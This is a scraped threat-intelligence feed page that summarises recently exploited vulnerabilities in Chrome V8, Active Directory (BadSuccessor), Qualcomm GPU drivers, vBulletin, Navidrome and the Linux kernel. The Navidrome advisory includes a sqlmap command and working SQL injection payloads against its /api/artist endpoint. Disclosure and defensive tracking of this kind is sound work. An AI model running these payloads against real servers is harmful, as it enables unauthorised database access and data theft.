Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
|
🚨 Marked as known exploited on June 3rd, 2025 (2 days ago).
Description: Google has released a security update for Chrome desktop, addressing three vulnerabilities, including a critical zero-day flaw in the V8 JavaScript engine that attackers are actively exploiting. The patch, now rolling out to Windows, Mac, and Linux users via version 137.0.7151.68/.69, aims to protect millions of Chrome users from potential heap corruption attacks. The zero-day, …
The post Google Patches Actively Exploited Zero-Day in Chrome’s V8 Engine appeared first on CyberInsider.
June 3rd, 2025 (2 days ago)
|
|
🚨 Marked as known exploited on June 3rd, 2025 (2 days ago).
Description: Google on Monday released out-of-band fixes to address three security issues in its Chrome browser, including one that it said has come under active exploitation in the wild.
The high-severity flaw is being tracked as CVE-2025-5419, and has been flagged as an out-of-bounds read and write vulnerability in the V8 JavaScript and WebAssembly engine.
"Out of bounds read and write in V8 in Google
EPSS Score: 0.12%
June 3rd, 2025 (2 days ago)
|
CVE-2025-5419 |
🚨 Marked as known exploited on June 3rd, 2025 (2 days ago).
Description: Out of bounds read and write in V8 in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
EPSS Score: 0.12%
June 3rd, 2025 (2 days ago)
|
|
🚨 Marked as known exploited on June 2nd, 2025 (3 days ago).
Description: Frequently asked questions about “BadSuccessor,” a zero-day privilege escalation vulnerability in Active Directory domains with at least one Windows Server 2025 domain controller.BackgroundTenable’s Research Special Operations (RSO) and the Identity Content team has compiled this blog to answer Frequently Asked Questions (FAQ) regarding a newly disclosed zero-day in Active Directory called BadSuccessor.FAQWhat is BadSuccessor?BadSuccessor is the name of a zero-day privilege escalation vulnerability in Active Directory that was discovered and disclosed by Yuval Gordon, a security researcher at Akamai.According to Gordon, the flaw exists in delegated Managed Service Accounts (dMSAs), a service account type in Active Directory (AD) that was introduced in Windows Server 2025 to enable the migration of non-managed service accounts.What are the vulnerabilities associated with BadSuccessor?As of June 2, Microsoft had not assigned a CVE identifier for BadSuccessor. Microsoft is the CVE Numbering Authority (CNA) for its products. Since there are currently no patches available for BadSuccessor, no CVE has been assigned. If Microsoft does assign a CVE alongside patches for it, we will update this blog accordingly.How is BadSuccessor exploited?To exploit BadSuccessor, an attacker needs to be able to access a user account with specific permissions in AD, and at least one domain controller in the domain needs to be running Windows Server 2025.Based on Akamai’s research, even if an AD do...
June 2nd, 2025 (3 days ago)
|
|
🚨 Marked as known exploited on June 2nd, 2025 (3 days ago).
Description: Qualcomm has released security patches for three zero-day vulnerabilities in the Adreno Graphics Processing Unit (GPU) driver that impact dozens of chipsets and are actively exploited in targeted attacks. [...]
June 2nd, 2025 (3 days ago)
|
|
🚨 Marked as known exploited on May 31st, 2025 (5 days ago).
Description: Summary of Releases v10.2.1 & v10.2.2
This month, we've released two new versions of Nuclei Templates, which introduce numerous improvements and new templates for Nuclei users.
Here are some highlighted stats from the combined releases:
🎉 106 new templates added
🔥 57 new CVEs covered
🛡️ 10 actively exploited KEVs included
🚀 11 first-time contributions
💰 Template Reward program launched
Introduction
The Nuclei Templates v10.2.1 and v10.2.2 were released earlier this Month, introducing
May 31st, 2025 (5 days ago)
|
|
🚨 Marked as known exploited on May 30th, 2025 (6 days ago).
Description: Two critical vulnerabilities affecting the open-source forum software vBulletin have been discovered, with one confirmed to be actively exploited in the wild. [...]
May 30th, 2025 (6 days ago)
|
|
🚨 Marked as known exploited on May 29th, 2025 (7 days ago).
Description: 🛡 Security Advisory: SQL Injection Vulnerability in Navidrome v0.55.2
Overview
This vulnerability arises due to improper input validation on the role parameter within the API endpoint /api/artist. Attackers can exploit this flaw to inject arbitrary SQL queries, potentially gaining unauthorized access to the backend database and compromising sensitive user information.
Details
Vulnerable Component:
API endpoint → /api/artist
Parameter → role
Vulnerability Type:
SQL Injection (stacked queries, UNION queries)
Database Affected:
SQLite (confirmed exploitation via SQLite-specific payloads)
Impact:
Successful exploitation allows an unauthenticated attacker to:
Execute arbitrary SQL commands
Extract or manipulate sensitive data (e.g., user records, playlists)
Potentially escalate privileges or disrupt service availability
Proof of Concept (PoC)
Example Exploit Command:
sqlmap.py -r navi --level 5 --risk 3 -a --banner --batch --tamper charencode --dbms sqlite
Sample Payloads:
Stacked Queries:
http://navidrome/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist');SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--
UNION-Based Query:
http://navidrome.local/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist') UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,CHAR(113,98,118,98,113)||CHAR(113,84,86,119,114,71,106,104,90,118,120,104,79,66,104,108,121,106,70,68,90,113,104,117,67,98,113,67,103,84,71,...
May 29th, 2025 (7 days ago)
|
|
🚨 Marked as known exploited on May 23rd, 2025 (13 days ago).
Description: Check out expert recommendations for protecting your AI system data. Plus, boost your IT department’s cybersecurity skills with a new interactive framework. In addition, learn about a malware campaign targeting critical infrastructure orgs. And get the latest on Russian cyber espionage and on a NIST effort to enhance vulnerability prioritization.Dive into five things that are top of mind for the week ending May 23.1 - Cyber agencies offer AI data security best practicesWith organizations gleefully deploying artificial intelligence (AI) tools to enhance their operations, cybersecurity teams face the critical task of securing AI data.If your organization is looking for guidance on how to protect the data used in AI systems, check out new best practices released this week by cyber agencies from Australia, New Zealand, the U.K. and the U.S.“This guidance is intended primarily for organizations using AI systems in their operations, with a focus on protecting sensitive, proprietary or mission-critical data,” reads the document titled “AI Data Security: Best Practices for Securing Data Used to Train & Operate AI Systems.”“The principles outlined in this information sheet provide a robust foundation for securing AI data and ensuring the reliability and accuracy of AI-driven outcomes,” it adds. By drafting this guidance, the authoring agencies seek to accomplish three goals:Create awareness about data security risks involved in developing, testing and deploying AI systems.Offer bes...
May 23rd, 2025 (13 days ago)
|
|
CVE-2025-37922 |
🚨 Marked as known exploited on May 20th, 2025 (16 days ago).
Description: In the Linux kernel, the following vulnerability has been resolved:
book3s64/radix : Align section vmemmap start address to PAGE_SIZE
A vmemmap altmap is a device-provided region used to provide
backing storage for struct pages. For each namespace, the altmap
should belong to that same namespace. If the namespaces are
created unaligned, there is a chance that the section vmemmap
start address could also be unaligned. If the section vmemmap
start address is unaligned, the altmap page allocated from the
current namespace might be used by the previous namespace also.
During the free operation, since the altmap is shared between two
namespaces, the previous namespace may detect that the page does
not belong to its altmap and incorrectly assume that the page is a
normal page. It then attempts to free the normal page, which leads
to a kernel crash.
Kernel attempted to read user page (18) - exploit attempt? (uid: 0)
BUG: Kernel NULL pointer dereference on read at 0x00000018
Faulting instruction address: 0xc000000000530c7c
Oops: Kernel access of bad area, sig: 11 [#1]
LE PAGE_SIZE=64K MMU=Radix SMP NR_CPUS=2048 NUMA pSeries
CPU: 32 PID: 2104 Comm: ndctl Kdump: loaded Tainted: G W
NIP: c000000000530c7c LR: c000000000530e00 CTR: 0000000000007ffe
REGS: c000000015e57040 TRAP: 0300 Tainted: G W
MSR: 800000000280b033 CR: 84482404
CFAR: c000000000530dfc DAR: 0000000000000018 DSISR: 40000000 IRQMASK: 0
GPR00: c000000000530e00 c000000015e572e0 c000000002c5cb00 c00c00...
EPSS Score: 0.02%
May 20th, 2025 (16 days ago)
|